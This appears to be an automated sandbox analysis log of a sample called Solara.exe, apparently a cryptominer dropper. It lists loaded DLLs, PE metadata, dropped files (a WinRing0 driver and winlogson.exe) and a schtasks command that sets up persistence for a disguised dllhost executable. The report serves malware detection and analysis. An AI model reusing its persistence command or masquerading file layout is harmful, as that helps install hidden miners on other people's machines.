Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Solara.exe.bin.exe

Static file information: File size 1360384 > 1048576

Source: Solara.exe.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: Solara.exe.bin.exe, 00000002.00000003.1636690920.0000000001266000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmp, Z6T9189FJQPDA5HSM49.exe, 00000008.00000000.1036685128.0000000000E22000.00000002.00000001.01000000.00000006.sdmp, Z6T9189FJQPDA5HSM49.exe.2.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.8.dr

Source: Z6T9189FJQPDA5HSM49.exe.2.dr

Static PE information: 0x9A21587A [Mon Dec 11 03:03:22 2051 UTC]

Source: Solara.exe.bin.exe	Static PE information: real checksum: 0x0 should be: 0x159282
Source: winlogson.exe.8.dr	Static PE information: real checksum: 0x7e7c4c should be: 0xaae72
Source: Z6T9189FJQPDA5HSM49.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x11c88

Source: winlogson.exe.8.dr

Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_008FC131 push ds; retf	0_2_008FC136
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_008FC147 push ds; retf	0_2_008FC148
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_0093DFCA push ecx; ret	0_2_0093DFDD
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00452068 push ebx; ret	2_2_00452069
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00451100 pushfd ; retn 0041h	2_2_00451101
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00451D1A push es; retn 0042h	2_2_00452065
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0045365F push esi; iretd	2_2_00453660
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0044E7CD push ds; retf	2_2_0044E7D2
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008FC131 push ds; retf	2_2_008FC136
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008FC147 push ds; retf	2_2_008FC148
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0093DFCA push ecx; ret	2_2_0093DFDD
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_008FA775 push es; iretd	2_2_008FA776
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_05134277 push esp; iretd	11_2_05134282
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_05134288 push esi; iretd	11_2_05134292
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_051342A8 push edi; iretd	11_2_051342B2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_05131D3B pushad ; iretd	11_2_05131D4A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_05131D4B pushad ; iretd	11_2_05131D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_05131D7B pushad ; iretd	11_2_05131D9A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_05131CAB pushad ; iretd	11_2_05131D2A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_05136F1C pushad ; ret	11_2_05136F23
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_05133862 push cs; iretd	11_2_0513386A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_08E563AD push ss; iretd	11_2_08E563B2

Source: Solara.exe.bin.exe

Static PE information: section name: .text entropy: 7.09207256696417

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe

File created: C:\ProgramData\Dllhost\WinRing0x64.sys

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	File created: C:\ProgramData\Dllhost\WinRing0x64.sys	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	File created: C:\ProgramData\Dllhost\winlogson.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File created: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	File created: C:\ProgramData\Dllhost\WinRing0x64.sys			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	File created: C:\ProgramData\Dllhost\winlogson.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
